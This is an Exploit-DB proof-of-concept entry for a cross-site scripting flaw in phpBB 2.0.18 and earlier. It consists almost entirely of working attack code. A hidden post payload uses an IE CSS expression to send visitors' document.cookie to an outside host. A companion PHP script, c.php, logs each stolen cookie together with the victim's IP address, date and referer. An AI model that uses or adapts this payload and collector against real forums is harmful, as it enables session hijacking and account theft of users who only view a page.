phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit

2005-12-21T00:00:00
ID EDB-ID:1383
Type exploitdb
Reporter jet
Modified 2005-12-21T00:00:00

Description

phpBB <= 2.0.18 Remote XSS Cookie Disclosure Exploit. Webapps exploit for php platform

                                        
                                            /******************************************************************

phpBB &lt;= 2.0.18 XSS Cookie Disclosure Proof of Concept
	-- 'the html is on exploit'

original exploit by:  (cXIb8O3) - 12/16/2005
proof of concept by: jet
	-- http://jet.carbon-4.net/
	
		develop a pure, lucid mind, not 
		depending upon sound, flavor,
		touch, odor, or any quality.
				- the diamond sutra

******************************************************************/

phpbb code:

&lt;B C="&gt;" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="&lt;B "&gt;'&lt;/B&gt;

c.php:

&lt;?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?&gt;

# milw0rm.com [2005-12-21]